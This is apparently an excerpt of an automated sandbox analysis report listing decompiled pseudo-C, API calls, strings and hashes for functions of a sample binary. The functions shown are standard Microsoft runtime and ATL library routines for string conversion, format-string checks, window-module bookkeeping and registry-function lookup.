                      • Instruction ID: 32d981535574c169de2679b7132b3361e8d3f5f4651cb8019ee12bf7eacfa363
                      • Opcode Fuzzy Hash: ac9158cd44979364038237aa202e27735b483e05ce12b59a5e96faaf2b0618ba
                      • Instruction Fuzzy Hash: AB410D71900218EBDB14EF94EC96FEEB7B8FB88705F004159F6066B291DB745A84CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E009549E0(short* __edx, void* __edi, void* __esi, char* _a4, int _a8) {
                      				int _v8;
                      				int _v12;
                      				int _v16;
                      				int _v20;
                      				char _v28;
                      				void _v36;
                      				int _v40;
                      				int _v44;
                      				short* _v48;
                      				int _v52;
                      				void _v56;
                      				int _t43;
                      				void* _t45;
                      				int _t50;
                      				int _t58;
                      				int _t73;
                      				short* _t74;
                      				void* _t87;
                      				void* _t88;
                      				void* _t89;
                      
                      				_t74 = __edx;
                      				memset( &_v56, 0xcccccccc, 0xd << 2);
                      				_t89 = _t88 + 0xc;
                      				if(_a4 == 0 || _a8 == 0) {
                      					_t43 = 0;
                      					goto L12;
                      				} else {
                      					_v8 = 0;
                      					_v12 = E00941AB0();
                      					_v16 = 0;
                      					_v20 = 0;
                      					E0094F2E0( &_v28);
                      					_v36 = 0;
                      					_t50 = MultiByteToWideChar(_v12, 0, _a4, _a8, 0, 0);
                      					__eflags = _t89 - _t89;
                      					_v40 = E009D1520(_t50, _t89 - _t89);
                      					_t52 = _v40;
                      					_v44 = _v40;
                      					__eflags = _a8 - 0xffffffff;
                      					if(_a8 == 0xffffffff) {
                      						_t73 = _v44 - 1;
                      						__eflags = _t73;
                      						_v44 = _t73;
                      					}
                      					_t74 = _v44;
                      					__imp__#4(0, _t74);
                      					__eflags = _t89 - _t89;
                      					_v36 = E009D1520(_t52, _t89 - _t89);
                      					__eflags = _v36;
                      					if(_v36 == 0) {
                      						L11:
                      						_v56 = _v36;
                      						E0094F220( &_v28);
                      						_t43 = _v56;
                      						goto L12;
                      					} else {
                      						_t58 = MultiByteToWideChar(_v12, 0, _a4, _a8, _v36, _v40);
                      						__eflags = _t89 - _t89;
                      						_v48 = E009D1520(_t58, _t89 - _t89);
                      						_t74 = _v48;
                      						__eflags = _t74 - _v40;
                      						if(__eflags != 0) {
                      							_t59 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x482, 0, "%ls", L"nResult == nConvertedLen");
                      							_t89 = _t89 + 0x18;
                      							__eflags = _t59 - 1;
                      							if(_t59 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v48 - _v40;
                      						if(_v48 == _v40) {
                      							goto L11;
                      						} else {
                      							_t74 = _v36;
                      							__imp__#6(_t74);
                      							__eflags = _t89 - _t89;
                      							E009D1520(_t59, _t89 - _t89);
                      							_v52 = 0;
                      							E0094F220( &_v28);
                      							_t43 = _v52;
                      							L12:
                      							_push(_t74);
                      							E009D14C0(_t87, 0x954b48);
                      							_t45 = _t43;
                      							return E009D1520(_t45, _t87 - _t89 + 0x34);
                      						}
                      					}
                      				}
                      			}























                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00954A4A
                      • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00954A77
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?), ref: 00954AA9
                      • SysFreeString.OLEAUT32(00000000), ref: 00954AF5
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00954B31
                      Strings
                      • %ls, xrefs: 00954AC6
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h, xrefs: 00954AD2
                      • nResult == nConvertedLen, xrefs: 00954AC1
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ByteCharMultiStringWide$AllocCheckFreeStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$nResult == nConvertedLen
                      • API String ID: 2571081082-1767654226
                      • Opcode ID: 698116f04a668e0d20ec8376277bc55a03d10b4371f8e058c75175d0915a7828
                      • Instruction ID: eeff575ac1bb27d0d1be044cb96a9b9cc2a99a5c5de75d6e246750c692a77b7f
                      • Opcode Fuzzy Hash: 698116f04a668e0d20ec8376277bc55a03d10b4371f8e058c75175d0915a7828
                      • Instruction Fuzzy Hash: 1E417176E40218AFCB50DFD9E846FEEB7B5AB88315F108219F9157B280D7749D84CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00990130(intOrPtr __ecx) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _t55;
                      				void* _t59;
                      				intOrPtr _t66;
                      				intOrPtr _t74;
                      				void* _t82;
                      
                      				_v8 = __ecx;
                      				if((E0098FDB0(_v8) & 0x000000ff) != 0) {
                      					_t66 = _v8;
                      					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
                      					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
                      						L4:
                      						return 1;
                      					}
                      					_t74 = _v8;
                      					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
                      					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
                      						_v28 = _v8 + 0x464;
                      						_t10 = _v8 + 0xaa4; // 0xff458800
                      						_t13 = ( *_t10 << 4) + 0x474; // 0x97b1da
                      						_v32 = _v8 + _t13;
                      						_v12 = _v28;
                      						while(1) {
                      							__eflags = _v12 - _v32;
                      							if(_v12 == _v32) {
                      								break;
                      							}
                      							_t23 = _v8 + 0x14; // 0x8b18408b
                      							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
                      							_v16 =  *_v12;
                      							_v16 = _v16 - 1;
                      							__eflags = _v16 - 3;
                      							if(_v16 > 3) {
                      								__eflags = 0;
                      								if(0 == 0) {
                      									_v20 = 0;
                      								} else {
                      									_v20 = 1;
                      								}
                      								_v24 = _v20;
                      								__eflags = _v24;
                      								if(__eflags == 0) {
                      									_t59 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
                      									_t82 = _t82 + 0x18;
                      									__eflags = _t59 - 1;
                      									if(_t59 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v24;
                      								if(_v24 != 0) {
                      									L22:
                      									_t55 = _v12 + 0x10;
                      									__eflags = _t55;
                      									_v12 = _t55;
                      									continue;
                      								} else {
                      									 *((intOrPtr*)(L00992F70(0))) = 0x16;
                      									E00992900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
                      									return 0;
                      								}
                      							}
                      							switch( *((intOrPtr*)(_v16 * 4 +  &M009902B8))) {
                      								case 0:
                      									E00974910(_v8 + 0x14);
                      									_t82 = _t82 + 4;
                      									goto L22;
                      								case 1:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00974B30(_v8 + 0x14);
                      									goto L22;
                      								case 2:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00974AF0(_v8 + 0x14);
                      									goto L22;
                      								case 3:
                      									_v8 = _v8 + 0x14;
                      									_v40 = E00974B10(_v8 + 0x14);
                      									_v36 = __edx;
                      									goto L22;
                      							}
                      						}
                      						return 1;
                      					}
                      					goto L4;
                      				}
                      				return 0;
                      			}

















                      Strings
                      • %ls, xrefs: 00990256
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00990262, 0099028F
                      • __crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_st, xrefs: 00990294
                      • ("Missing position in the format string", 0), xrefs: 00990251, 00990299
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_st$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-4110031974
                      • Opcode ID: 9b9d26443f5ad83a60f0f09bd5a9d25d2f891a9a909217997885fb8edf2331d3
                      • Instruction ID: dc01b5e22647e5a9e244902560a872314de55c7b0be60a5a345e5692d95c4d88
                      • Opcode Fuzzy Hash: 9b9d26443f5ad83a60f0f09bd5a9d25d2f891a9a909217997885fb8edf2331d3
                      • Instruction Fuzzy Hash: D9419DB0E04209EFCF04DF98C945BAEB3B5AFC5308F2081A9D0256B386C735AE01DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E009902D0(intOrPtr __ecx) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _t55;
                      				void* _t59;
                      				intOrPtr _t66;
                      				intOrPtr _t74;
                      				void* _t82;
                      
                      				_v8 = __ecx;
                      				if((E0098FE50(_v8) & 0x000000ff) != 0) {
                      					_t66 = _v8;
                      					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
                      					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
                      						L4:
                      						return 1;
                      					}
                      					_t74 = _v8;
                      					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
                      					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
                      						_v28 = _v8 + 0x464;
                      						_t10 = _v8 + 0xaa4; // 0xb60fff45
                      						_t13 = ( *_t10 << 4) + 0x474; // 0x97b9ec
                      						_v32 = _v8 + _t13;
                      						_v12 = _v28;
                      						while(1) {
                      							__eflags = _v12 - _v32;
                      							if(_v12 == _v32) {
                      								break;
                      							}
                      							_t23 = _v8 + 0x14; // 0x8b18408b
                      							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
                      							_v16 =  *_v12;
                      							_v16 = _v16 - 1;
                      							__eflags = _v16 - 3;
                      							if(_v16 > 3) {
                      								__eflags = 0;
                      								if(0 == 0) {
                      									_v20 = 0;
                      								} else {
                      									_v20 = 1;
                      								}
                      								_v24 = _v20;
                      								__eflags = _v24;
                      								if(__eflags == 0) {
                      									_t59 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
                      									_t82 = _t82 + 0x18;
                      									__eflags = _t59 - 1;
                      									if(_t59 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v24;
                      								if(_v24 != 0) {
                      									L22:
                      									_t55 = _v12 + 0x10;
                      									__eflags = _t55;
                      									_v12 = _t55;
                      									continue;
                      								} else {
                      									 *((intOrPtr*)(L00992F70(0))) = 0x16;
                      									E00992900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
                      									return 0;
                      								}
                      							}
                      							switch( *((intOrPtr*)(_v16 * 4 +  &M00990458))) {
                      								case 0:
                      									E00974910(_v8 + 0x14);
                      									_t82 = _t82 + 4;
                      									goto L22;
                      								case 1:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00974B30(_v8 + 0x14);
                      									goto L22;
                      								case 2:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00974AF0(_v8 + 0x14);
                      									goto L22;
                      								case 3:
                      									_v8 = _v8 + 0x14;
                      									_v40 = E00974B10(_v8 + 0x14);
                      									_v36 = __edx;
                      									goto L22;
                      							}
                      						}
                      						return 1;
                      					}
                      					goto L4;
                      				}
                      				return 0;
                      			}


















                      Strings
                      • %ls, xrefs: 009903F6
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00990402, 0099042F
                      • __crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_upd, xrefs: 00990434
                      • ("Missing position in the format string", 0), xrefs: 009903F1, 00990439
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_upd$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-208977200
                      • Opcode ID: 360d9eb9acc4bb3abd28e1417b27e1d5e68955840ad7daafcbc1ae88b1ffba04
                      • Instruction ID: 4b90a7ad245560975a438879f86d4f8e1f9619ad7e6c4d04d215af4143c4bbf2
                      • Opcode Fuzzy Hash: 360d9eb9acc4bb3abd28e1417b27e1d5e68955840ad7daafcbc1ae88b1ffba04
                      • Instruction Fuzzy Hash: DF4191B0E44209EFCF04DF98C942BAEB7B5ABC4308F208569D11977342D775AE41DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E0098FF90(intOrPtr __ecx) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _t55;
                      				void* _t59;
                      				intOrPtr _t66;
                      				intOrPtr _t74;
                      				void* _t82;
                      
                      				_v8 = __ecx;
                      				if((E0098FD10(_v8) & 0x000000ff) != 0) {
                      					_t66 = _v8;
                      					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
                      					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
                      						L4:
                      						return 1;
                      					}
                      					_t74 = _v8;
                      					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
                      					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
                      						_v28 = _v8 + 0x464;
                      						_t10 = _v8 + 0xaa4; // 0xb60fff45
                      						_t13 = ( *_t10 << 4) + 0x474; // 0x97a9ca
                      						_v32 = _v8 + _t13;
                      						_v12 = _v28;
                      						while(1) {
                      							__eflags = _v12 - _v32;
                      							if(_v12 == _v32) {
                      								break;
                      							}
                      							_t23 = _v8 + 0x14; // 0x8b18408b
                      							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
                      							_v16 =  *_v12;
                      							_v16 = _v16 - 1;
                      							__eflags = _v16 - 3;
                      							if(_v16 > 3) {
                      								__eflags = 0;
                      								if(0 == 0) {
                      									_v20 = 0;
                      								} else {
                      									_v20 = 1;
                      								}
                      								_v24 = _v20;
                      								__eflags = _v24;
                      								if(__eflags == 0) {
                      									_t59 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
                      									_t82 = _t82 + 0x18;
                      									__eflags = _t59 - 1;
                      									if(_t59 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v24;
                      								if(_v24 != 0) {
                      									L22:
                      									_t55 = _v12 + 0x10;
                      									__eflags = _t55;
                      									_v12 = _t55;
                      									continue;
                      								} else {
                      									 *((intOrPtr*)(L00992F70(0))) = 0x16;
                      									E00992900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::stream_output_adapter<char> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
                      									return 0;
                      								}
                      							}
                      							switch( *((intOrPtr*)(_v16 * 4 +  &M00990118))) {
                      								case 0:
                      									E00974910(_v8 + 0x14);
                      									_t82 = _t82 + 4;
                      									goto L22;
                      								case 1:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00974B30(_v8 + 0x14);
                      									goto L22;
                      								case 2:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00974AF0(_v8 + 0x14);
                      									goto L22;
                      								case 3:
                      									_v8 = _v8 + 0x14;
                      									_v40 = E00974B10(_v8 + 0x14);
                      									_v36 = __edx;
                      									goto L22;
                      							}
                      						}
                      						return 1;
                      					}
                      					goto L4;
                      				}
                      				return 0;
                      			}


















                      Strings
                      • %ls, xrefs: 009900B6
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 009900C2, 009900EF
                      • __crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::stream_output_adapter<char> >::validate_and_update_st, xrefs: 009900F4
                      • ("Missing position in the format string", 0), xrefs: 009900B1, 009900F9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::stream_output_adapter<char> >::validate_and_update_st$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-2500556390
                      • Opcode ID: db6c7cb07524ef1b2128ff5c45050fac9aedc150d6f228836bc53598ee954691
                      • Instruction ID: 8ce12411df12e338e4d03f73d0c3397445edd777717f2c229197c26c0b0c24e8
                      • Opcode Fuzzy Hash: db6c7cb07524ef1b2128ff5c45050fac9aedc150d6f228836bc53598ee954691
                      • Instruction Fuzzy Hash: 3C41AFB0E08208EFCF14DF98D942BAEB775AFC1308F2085A9E1156B342D775AE41DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E0094BE20(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                      				char _v8;
                      				char _v12;
                      				char _v16;
                      				char _v20;
                      				char _v24;
                      				char _v28;
                      				void* _t30;
                      				void* _t35;
                      				void* _t38;
                      				void* _t40;
                      				void* _t46;
                      				void* _t48;
                      				intOrPtr _t61;
                      				void* _t65;
                      				void* _t68;
                      				void* _t69;
                      
                      				_t66 = __esi;
                      				_t65 = __edi;
                      				_t48 = __ebx;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				if(_a4 == 0) {
                      					E009424B0(__esi, 0xc0000005, 1);
                      				}
                      				if(_a8 == 0) {
                      					L4:
                      					_t30 = L00994930(_t73, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x2094, 0, "%ls", L"pData != 0 && pObject != 0");
                      					_t69 = _t69 + 0x18;
                      					if(_t30 == 1) {
                      						asm("int3");
                      					}
                      					L6:
                      					if(_a8 == 0 || _a12 == 0) {
                      						E009424B0(_t66, 0xc0000005, 1);
                      					}
                      					 *_a8 = _a12;
                      					_t67 = _t69;
                      					 *((intOrPtr*)(_a8 + 4)) = E009D1520(GetCurrentThreadId(), _t69 - _t69);
                      					_t61 = _a4 + 4;
                      					E00951D00(_t48,  &_v16, _t65, _t69, _t61, 0);
                      					_t35 = E00951D90( &_v16, _t69);
                      					_t78 = _t35;
                      					if(_t35 >= 0) {
                      						 *((intOrPtr*)(_a8 + 8)) =  *((intOrPtr*)(_a4 + 0x1c));
                      						_t61 = _a4;
                      						 *((intOrPtr*)(_t61 + 0x1c)) = _a8;
                      						_t38 = E00951D60( &_v16);
                      					} else {
                      						_push("ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData\n");
                      						_push(0);
                      						_push(E0094F1E0(0xb33748));
                      						_push(E009423B0( &_v28, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x209d));
                      						E009423E0(_t48, _t65, _t67, _t78);
                      						_t69 = _t69 + 0x10;
                      						if(0 == 0) {
                      							_t46 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x209e, 0, "%ls", 0x9f40dc);
                      							_t69 = _t69 + 0x18;
                      							if(_t46 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						_t38 = E00951D60( &_v16);
                      					}
                      					_push(_t61);
                      					E009D14C0(_t68, 0x94bf74);
                      					_t40 = _t38;
                      					return E009D1520(_t40, _t68 - _t69 + 0x18);
                      				}
                      				_t73 = _a12;
                      				if(_a12 != 0) {
                      					goto L6;
                      				}
                      				goto L4;
                      			}




















                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 0094BEA4
                      • _Smanip.LIBCPMTD ref: 0094BEF3
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094BF5C
                        • Part of subcall function 009424B0: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 009424C2
                      Strings
                      • %ls, xrefs: 0094BE61, 0094BF0A
                      • ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData, xrefs: 0094BED4
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094BEEB
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094BE6D, 0094BF16
                      • pData != 0 && pObject != 0, xrefs: 0094BE5C
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckCurrentExceptionRaiseSmanipStackThreadVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData$pData != 0 && pObject != 0
                      • API String ID: 2312070509-3206224083
                      • Opcode ID: 51aece2d93672da98221d55876a70342ffc470a30e934d51910c9c307823e4e9
                      • Instruction ID: f17460eb95ea59d4fb26dc835e0f2bd8dbe783caf98b2f31f45918858e590e45
                      • Opcode Fuzzy Hash: 51aece2d93672da98221d55876a70342ffc470a30e934d51910c9c307823e4e9
                      • Instruction Fuzzy Hash: AC318370A40308ABDB14EF64DC42FAE7764AB94705F10C156FA09AA292E7B09A44CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00943200(intOrPtr __ecx, void* __esi, void* _a4, char* _a8, int _a12, char* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
                      				intOrPtr* _v8;
                      				struct HINSTANCE__* _v12;
                      				struct HINSTANCE__* _v16;
                      				void* _t35;
                      				long _t40;
                      				_Unknown_base(*)()* _t43;
                      				void* _t49;
                      				void* _t50;
                      				void* _t72;
                      				void* _t73;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if( *_v8 == 0) {
                      					__eflags =  *((intOrPtr*)(_v8 + 4));
                      					if(__eflags == 0) {
                      						L11:
                      						_t35 = 1;
                      						L12:
                      						return E009D1520(_t35, _t72 - _t73 + 0xc);
                      					}
                      					_t40 = RegCreateKeyExA(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
                      					__eflags = _t73 - _t73;
                      					_t35 = E009D1520(_t40, __eflags);
                      					goto L12;
                      				}
                      				_v12 = E009D1520(GetModuleHandleA("Advapi32.dll"), _t73 - _t73);
                      				_t77 = _v12;
                      				if(_v12 == 0) {
                      					_t50 = L00994930(_t77, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x27d, 0, "%ls", L"hAdvAPI32 != 0");
                      					_t73 = _t73 + 0x18;
                      					if(_t50 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					_t43 = GetProcAddress(_v12, "RegCreateKeyTransactedA");
                      					__eflags = _t73 - _t73;
                      					_v16 = E009D1520(_t43, _t73 - _t73);
                      					__eflags = _v16;
